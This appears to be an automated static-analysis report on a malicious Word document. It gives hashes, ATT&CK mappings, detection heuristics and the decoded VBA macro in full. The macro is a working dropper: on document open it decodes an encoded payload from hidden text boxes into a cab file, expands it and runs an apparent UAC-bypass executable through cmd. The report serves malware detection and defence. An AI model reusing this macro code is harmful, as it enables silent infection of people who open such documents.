Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2046bb14d9f63612…

MALICIOUS

Office (OLE)

315.5 KB Created: 2017-12-24 07:23:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 665249eb8e0375c8553c2887504e9312 SHA-1: 9e2c0bd19a77d712055ccc0276fdc062e9351436 SHA-256: 2046bb14d9f63612a6d19d5224727f3607be4e8f8ad13e9efe34620fda2d9d99
230 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro, which is a common technique for initial execution. The macros utilize Shell() calls and reference cmd.exe, indicating an attempt to execute external commands. The ClamAV detection name 'Doc.Dropper.Agent-6424154-0' strongly suggests the file's purpose is to drop and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6424154-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6424154-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3235 bytes
SHA-256: 73022e710569e8f8ea1c134f1f55cf0ab0f13ecdc702545e52b03e86c94dfc2b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Control = "TextBox2, 1, 1, MSForms, TextBox"
Private Function debase64(lpInBuffer As String, nOffset As Long, nCount As Long, OutputFile As String) As Long
    Dim strKey As String
    Dim lpOutBuffer() As Byte
    Dim chr1, chr2, chr3, enc1, enc2, enc3, enc4 As Byte
    Dim nIndex, nResult As Long
    
    strKey = "SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8"
  
    ReDim lpOutBuffer(nCount) As Byte
    
    nIndex = 1
    nResult = 0
    
    Do While nIndex <= nCount
        enc1 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc2 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc3 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc4 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        chr1 = (enc1 * 4) Or (enc2 \ 16)
        chr2 = ((enc2 And 15) * 16) Or (enc3 \ 4)
        chr3 = ((enc3 And 3) * 64) Or enc4
        
        lpOutBuffer(nResult) = chr1
        nResult = nResult + 1
        
        If enc3 <> 64 Then
            lpOutBuffer(nResult) = chr2
            nResult = nResult + 1
        End If
        
        If enc4 <> 64 Then
            lpOutBuffer(nResult) = chr3
            nResult = nResult + 1
        End If
    Loop
    
    ReDim Preserve lpOutBuffer(nResult - 1) As Byte
    
    Open OutputFile For Binary As #2
    Put #2, , lpOutBuffer
    Close #2
    
    debase64 = nResult
End Function

Private Function IsWin64() As Boolean
    Dim sTempPath As String
    
    sTempPath = Environ("SystemRoot")
    
    sTempPath = sTempPath + "\SysWOW64"
    
    sTempPath = Dir(sTempPath, vbDirectory)
  
    If sTempPath = "" Then
        IsWin64 = False
    Else
        IsWin64 = True
    End If
End Function

Private Sub Document_Open()
    Dim nResult As Long
    Dim bResult As Boolean
    Dim sTempPath As String
    Dim sTempFile As String

    With ActiveDocument.Content
        .Font.ColorIndex = wdBlack
        '.Paragraphs(4).Range.Font.ColorIndex = wdRed
    End With
    
    If TextBox1.Value <> 1 Then
        sTempPath = Environ("LOCALAPPDATA")
        sTempFile = sTempPath & "\Temp\setup.cab"
        
        bResult = IsWin64()
        
        If bResult = False Then
            nResult = debase64(TextBox1.Text, 0, TextBox1.TextLength, sTempFile)
        Else
            nResult = debase64(TextBox2.Text, 0, TextBox2.TextLength, sTempFile)
        End If
            
        nResult = Shell("cmd /c expand %TEMP%\setup.cab -F:* %TEMP% && cd /d %TEMP% && del /f /q setup.cab && uacme.exe", 0)
    End If
    
    TextBox1.Value = 1
    TextBox2.Value = 1
    ActiveDocument.Save
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.